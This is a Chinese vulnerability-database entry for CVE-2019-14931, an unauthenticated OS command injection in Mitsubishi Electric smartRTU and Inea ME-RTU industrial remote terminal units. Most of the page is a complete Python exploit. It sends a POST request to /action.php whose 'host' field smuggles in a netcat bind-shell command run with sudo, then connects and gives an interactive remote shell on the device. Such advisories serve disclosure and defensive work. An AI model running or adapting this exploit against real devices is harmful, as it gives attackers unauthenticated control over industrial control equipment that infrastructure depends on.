Mitsubishi Electric smartRTU和Inea ME-RTU 操作系统命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1702270 漏洞类型 操作系统命令注入
发布时间 2019-08-14 更新时间 2019-10-31
CVE编号 CVE-2019-14931 CNNVD-ID CNNVD-201910-1535
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080056
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201910-1535
|漏洞详情
Mitsubishi Electric smartRTU是日本Mitsubishi Electric公司的一款智能远程终端单元(RTU)。Inea ME-RTU是斯洛文尼亚Inea公司的一款智能通信网关产品。 Mitsubishi Electric smartRTU 2.02及之前版本和INEA ME-RTU 3.0及之前版本中存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。
|漏洞EXP
#!/usr/bin/python

# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
# Date: 29 June 2019 
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0 
# CVE-ID: CVE-2019-14931
# Full write-up: https://www.mogozobo.com/?p=3593

import sys, os, requests, socket

os.system('clear')

print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= Bind_Me-smartRTU  by @xerubus =-    
|   D _]/\ \  -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)

host = raw_input("Enter RTU IP address: ")
port = raw_input("Enter bind shell port number: ")
	
php_page = '/action.php'
url = "http://{}{}".format(host, php_page)
payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}

print "\n[+] Building payload"
print "[+] Sending payload"
print "[+] Attempting connection to smartRTU"

try:
   r = requests.post(url, data=payload, timeout=1)
except:
   pass

port = (int(port))

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((host, port))
	
   try :  
      print "[+] Connected to the smartRTU!\n"
      while 1:  
         cmd = raw_input("(smartRTU-shell) # ");  
         s.send(cmd + "\n");  
         result = s.recv(1024).strip();  
         if not len(result) :  
            print "\n[!] Play nice now skiddies....\n\n"
            s.close();  
            break;  
         print(result);  

   except KeyboardInterrupt:
      print "\n[+] ^C Received, closing connection"
      s.close();
   except EOFError:
      print "\n[+] ^D Received, closing connection"
      s.close();

except socket.error:
   print "[!] Failed to connect to bind shell."
|参考资料

来源:MISC

链接:https://www.mogozobo.com/


来源:MISC

链接:https://www.mogozobo.com/?p=3593


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-14931